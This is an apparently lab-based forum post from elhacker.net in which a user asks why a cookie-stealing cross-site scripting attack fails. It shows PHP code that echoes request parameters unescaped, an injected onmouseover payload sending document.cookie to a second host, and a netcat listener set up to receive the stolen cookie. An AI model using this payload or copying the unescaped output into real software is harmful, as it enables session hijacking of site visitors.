elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  XSS persistente - same origin
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: XSS persistente - same origin  (Leído 2,418 veces)
cascan

Desconectado Desconectado

Mensajes: 29


Ver Perfil
XSS persistente - same origin
« en: 16 Febrero 2012, 21:49 pm »

Hola a todos, estoy tratando de realizar un xss persistente y no logro dar con la solucion, probablemente es un problema de same origin...

esto es lo que tengo...

Tengo un server con:
------------------------------
<?php

if (isset($_GET['quantity'])) {

$quantity = $_GET['quantity'];
$item = $_GET['item'];

echo "You ordered ". $quantity . " " . $item . ".<br />";

setcookie("Ordering", $_GET['item'], time() + 31536000);
print_r($_COOKIE);
}


echo ('

<html><body>
<h4>Tizag Art Supply Order Form</h4>
<form action="y.php" method="get">
<select name="item">
<option>Paint</option>
<option>Brushes</option>
<option>Erasers</option>
</select>
Quantity: <input name="quantity" type="text" />
<input type="submit" />
</form>

</body></html>


');
?>

------------------------------

Tengo un browser que inyecta en el url:
http://10.10.10.10/prueba.php?item=Paint&quantity=999 <a onmouseover="document.location='http://10.10.10.20:5004/'document.cookie;">now </a>

Y tengo en 10.10.10.20 un nc -l -p 5004 en espera de la peticion

Cuando un maquina de la ip 10.10.10.30 ingresa a la 10.10.10.10 y pasa el mouse por "now" llega la informacion a netcat pero no la cookie....
Que hago mal? gracias
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Battlefield 3 no se me instala porque Origin lo detecta como ya instalado
Juegos y Consolas
vincent13m 6 14,180 Último mensaje 11 Enero 2012, 14:30 pm
por zyxel-MK
no me dectecta el battlefield 3 en origin
Juegos y Consolas
marki303 1 3,224 Último mensaje 4 Febrero 2012, 10:51 am
por lalalalalala
Anunciado el 'portátil más potente' de mano de Origin PC
Noticias
wolfbcn 1 2,558 Último mensaje 13 Febrero 2012, 21:56 pm
por CrowX
xss no persistente
Nivel Web
ruben_linux 8 3,955 Último mensaje 28 Agosto 2012, 23:29 pm
por ruben_linux
Programa persistente en C#
.NET (C#, VB.NET, ASP)
Kaxperday 2 2,437 Último mensaje 31 Mayo 2015, 13:15 pm
por Kaxperday
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines